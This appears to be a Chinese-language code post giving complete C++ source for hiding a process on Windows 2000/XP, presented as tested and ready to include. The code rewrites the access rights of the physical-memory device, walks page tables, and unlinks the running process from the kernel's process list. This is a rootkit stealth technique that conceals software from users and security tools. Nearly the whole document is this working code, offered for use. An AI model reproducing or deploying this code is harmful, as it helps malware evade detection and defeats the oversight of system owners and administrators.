在2000和xp下，隐藏进程，VC6.0测试通过

头文件： // //HideProcess.h BOOL HideProcess();

CPP源文件： / //HideProcess.cpp #include<windows.h> #include<Accctrl.h> #include<Aclapi.h> #include"HideProcess.h" #define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK  {     NTSTATUS Status;     ULONG Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING  {     USHORT Length;     USHORT MaximumLength;     PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; #define OBJ_INHERIT                0x00000002L #define OBJ_PERMANENT            0x00000010L #define OBJ_EXCLUSIVE            0x00000020L #define OBJ_CASE_INSENSITIVE    0x00000040L #define OBJ_OPENIF                0x00000080L #define OBJ_OPENLINK            0x00000100L #define OBJ_KERNEL_HANDLE        0x00000200L #define OBJ_VALID_ATTRIBUTES    0x000003F2L typedef struct _OBJECT_ATTRIBUTES  {     ULONG Length;     HANDLE RootDirectory;     PUNICODE_STRING ObjectName;     ULONG Attributes;     PVOID SecurityDescriptor;     PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(     OUT PHANDLE SectionHandle,     IN ACCESS_MASK DesiredAccess,     IN POBJECT_ATTRIBUTES ObjectAttributes     ); typedef VOID (CALLBACK* RTLINITUNICODESTRING)(     IN OUT PUNICODE_STRING DestinationString,     IN PCWSTR SourceString     ); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; //--------------------------------------------------------------------------- BOOL InitNTDLL() {     g_hNtDLL = LoadLibrary("ntdll.dll");     if (NULL == g_hNtDLL)         return FALSE;     RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");     ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");     return TRUE; } //--------------------------------------------------------------------------- VOID CloseNTDLL() {     if(NULL != g_hNtDLL)         FreeLibrary(g_hNtDLL);     g_hNtDLL = NULL; } //--------------------------------------------------------------------------- VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)  {      PACL pDacl                    = NULL;      PSECURITY_DESCRIPTOR pSD    = NULL;      PACL pNewDacl = NULL;           DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD);     if(ERROR_SUCCESS != dwRes)     {     if(pSD)          LocalFree(pSD);      if(pNewDacl)          LocalFree(pNewDacl);      }     EXPLICIT_ACCESS ea;      RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));      ea.grfAccessPermissions = SECTION_MAP_WRITE;      ea.grfAccessMode = GRANT_ACCESS;      ea.grfInheritance= NO_INHERITANCE;      ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;      ea.Trustee.TrusteeType = TRUSTEE_IS_USER;      ea.Trustee.ptstrName = "CURRENT_USER";     dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);          if(ERROR_SUCCESS != dwRes)     {     if(pSD)          LocalFree(pSD);      if(pNewDacl)          LocalFree(pNewDacl);      }     dwRes = SetSecurityInfo (hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);          if(ERROR_SUCCESS != dwRes)     {     if(pSD)          LocalFree(pSD);      if(pNewDacl)          LocalFree(pNewDacl);      } }  //--------------------------------------------------------------------------- HANDLE OpenPhysicalMemory() {     NTSTATUS status;     UNICODE_STRING physmemString;     OBJECT_ATTRIBUTES attributes;     ULONG PhyDirectory;     g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);     GetVersionEx (&g_osvi);     if (5 != g_osvi.dwMajorVersion)         return NULL;     switch(g_osvi.dwMinorVersion)     {         case 0:             PhyDirectory = 0x30000;             break; //2k         case 1:             PhyDirectory = 0x39000;             break; //xp         default:             return NULL;     }     RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");     attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);     attributes.RootDirectory            = NULL;     attributes.ObjectName                = &physmemString;     attributes.Attributes                = 0;     attributes.SecurityDescriptor        = NULL;     attributes.SecurityQualityOfService    = NULL;     status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);     if(status == STATUS_ACCESS_DENIED)     {          status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);         SetPhyscialMemorySectionCanBeWrited(g_hMPM);          CloseHandle(g_hMPM);         status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);      }     if(!NT_SUCCESS(status))          return NULL;     g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);     if( g_pMapPhysicalMemory == NULL )         return NULL;     return g_hMPM; } //--------------------------------------------------------------------------- PVOID LinearToPhys(PULONG BaseAddress, PVOID addr) {     ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;     PGDE = BaseAddress[VAddr>>22];     if (0 == (PGDE&1))         return 0;     ULONG tmp = PGDE & 0x00000080;     if (0 != tmp)     {         PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);     }     else     {         PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);         PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];                  if (0 == (PTE&1))             return 0;         PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);         UnmapViewOfFile((PVOID)PGDE);     }     return (PVOID)PAddr; } //--------------------------------------------------------------------------- ULONG GetData(PVOID addr) {     ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);     PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);          if (0 == tmp)         return 0;     ULONG ret = tmp[(phys & 0xFFF)>>2];     UnmapViewOfFile(tmp);     return ret; } //--------------------------------------------------------------------------- BOOL SetData(PVOID addr,ULONG data) {     ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);     PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);     if (0 == tmp)         return FALSE;     tmp[(phys & 0xFFF)>>2] = data;     UnmapViewOfFile(tmp);     return TRUE; } //--------------------------------------------------------------------------- long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) {    ExitProcess(0);    return 1 ; } //--------------------------------------------------------------------------- BOOL YHideProcess() { //    SetUnhandledExceptionFilter(exeception);     if (FALSE == InitNTDLL())         return FALSE;     if (0 == OpenPhysicalMemory())         return FALSE;     ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb     ULONG process = GetData(PVOID(thread + 0x44)); //kpeb     ULONG fw, bw;     if (0 == g_osvi.dwMinorVersion)     {         fw = GetData(PVOID(process + 0xa0));         bw = GetData(PVOID(process + 0xa4));             }     if (1 == g_osvi.dwMinorVersion)     {         fw = GetData(PVOID(process + 0x88));         bw = GetData(PVOID(process + 0x8c));     }              SetData(PVOID(fw + 4), bw);     SetData(PVOID(bw), fw);     CloseHandle(g_hMPM);     CloseNTDLL();     return TRUE; } BOOL HideProcess() {  static BOOL b_hide = false;  if (!b_hide)  {   b_hide = true;   YHideProcess();   return true;  }  return true; }

然后在需要隐藏进程的时候#incoude"HideProcess.h",调用HideProcess()即可。在2000和xp下，隐藏进程，VC6.0测试通过